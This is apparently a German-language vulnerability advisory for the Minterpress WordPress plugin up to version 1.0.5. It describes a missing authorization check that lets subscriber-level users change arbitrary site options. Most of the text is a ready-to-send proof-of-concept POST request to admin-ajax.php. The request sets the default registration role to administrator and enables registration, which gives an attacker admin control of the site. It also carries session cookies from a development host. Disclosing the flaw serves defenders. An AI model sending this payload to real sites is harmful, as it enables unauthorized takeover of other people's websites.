
Minterpress <= 1.0.5 - Fehlende Autorisierung für authentifizierte Benutzer (Subscriber+) zur beliebigen Aktualisierung von Optionen
Minterpress <= 1.0.5 – Fehlende Autorisierung für authentifizierte (Abonnent+) Benutzer führt zu beliebigen Options-Updates
Das Minterpress-Plugin für WordPress ist anfällig für unbefugte Datenänderungen, die zu einer Privilegienausweitung führen können, da in allen Versionen bis einschließlich 1.0.5 eine Fähigkeitsprüfung fehlt. Dadurch können authentifizierte Angreifer mit Abonnenten-Zugriff und höher beliebige Optionen auf der WordPress-Seite aktualisieren. Dies kann genutzt werden, um die Standardrolle für die Registrierung auf Administrator zu setzen und die Benutzerregistrierung zu aktivieren, sodass Angreifer administrative Benutzerzugriffe auf eine verwundbare Website erhalten.
Ändern Sie die Cookies in die Cookies Ihres angemeldeten Benutzers.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Cookie: wordpress_sec_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C31038bfa66d0777c50fba66263f613d288a20d1e14dfc0fc06903f77d1c9e41f; popup_time=2; alwaysStrip=1; _ga=GA1.2.1953252658.1732269795; _ga_16PD6PV48S=GS1.2.1732269795.1.0.1732270283.0.0.0; wp-settings-time-1=1734520301; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C987ff9134b881efe3cced2fa12593fd0ba5b2b02613fb93f48433b112015551a; PHPSESSID=49f0a4bfb294cad31ed4a83ede9bf485; tk_ai=zv7IX5yQT%2F6RzXuKQwqmMvEV; th_shop_mania_thms_time=1735227350366; tk_qs=
action=update_options&options={"default_role":"administrator","users_can_register":"1"}